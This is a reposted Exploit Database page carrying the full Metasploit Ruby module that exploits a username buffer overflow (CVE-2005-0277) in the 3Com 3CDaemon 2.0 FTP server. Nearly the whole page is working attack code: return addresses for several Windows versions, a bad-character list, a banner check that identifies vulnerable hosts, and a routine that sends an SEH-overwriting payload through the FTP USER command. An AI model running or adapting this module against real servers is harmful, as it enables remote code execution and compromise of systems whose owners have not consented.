3Com 3CDaemon 2.0 FTP Server – ‘Username’ Remote Overflow (Metasploit)

• Exploit Database
• 13 阅读

• 作者： Metasploit
  日期： 2010-09-20
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16730/

• ##
  # $Id: 3cdaemon_ftp_user.rb 10394 2010-09-20 08:06:27Z jduck $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = AverageRanking
  
  	include Msf::Exploit::Remote::Ftp
  	include Msf::Exploit::Remote::Seh
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow',
  			'Description'=> %q{
  					This module exploits a vulnerability in the 3Com 3CDaemon
  				FTP service. This package is being distributed from the 3Com
  				web site and is recommended in numerous support documents.
  				This module uses the USER command to trigger the overflow.
  			},
  			'Author' => [ 'hdm' ],
  			'License'=> MSF_LICENSE,
  			'Version'=> '$Revision: 10394 $',
  			'References' =>
  				[
  					[ 'CVE', '2005-0277'],
  					[ 'OSVDB', '12810'],
  					[ 'OSVDB', '12811'],
  					[ 'BID', '12155'],
  					[ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],
  				],
  			'Privileged' => false,
  			'Payload'=>
  				{
  					'Space'=> 674,
  					'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
  					'StackAdjustment' => -3500,
  					'Compat' =>
  						{
  							'ConnectionType' => "-find"
  						}
  				},
  			'Targets'=>
  				[
  					[
  						'Windows 2000 English', # Tested OK - hdm 11/24/2005
  						{
  							'Platform' => 'win',
  							'Ret'=> 0x75022ac4, # ws2help.dll
  						},
  					],
  					[
  						'Windows XP English SP0/SP1',
  						{
  							'Platform' => 'win',
  							'Ret'=> 0x71aa32ad, # ws2help.dll
  						},
  					],
  					[
  						'Windows NT 4.0 SP4/SP5/SP6',
  						{
  							'Platform' => 'win',
  							'Ret'=> 0x77681799, # ws2help.dll
  						},
  					],
  					[
  						'Windows 2000 Pro SP4 French',
  						{
  							'Platform' => 'win',
  							'Ret' => 0x775F29D0,
  						},
  					],
  
  				],
  			'DisclosureDate' => 'Jan 4 2005'))
  	end
  
  	def check
  		connect
  		disconnect
  		if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
  			return Exploit::CheckCode::Vulnerable
  		end
  		return Exploit::CheckCode::Safe
  	end
  
  	def exploit
  		connect
  
  		print_status("Trying target #{target.name}...")
  
  		buf= rand_text_english(2048, payload_badchars)
  		seh= generate_seh_payload(target.ret)
  		buf[229, seh.length] = seh
  
  		send_cmd( ['USER', buf] , false )
  
  		handler
  		disconnect
  	end
  
  end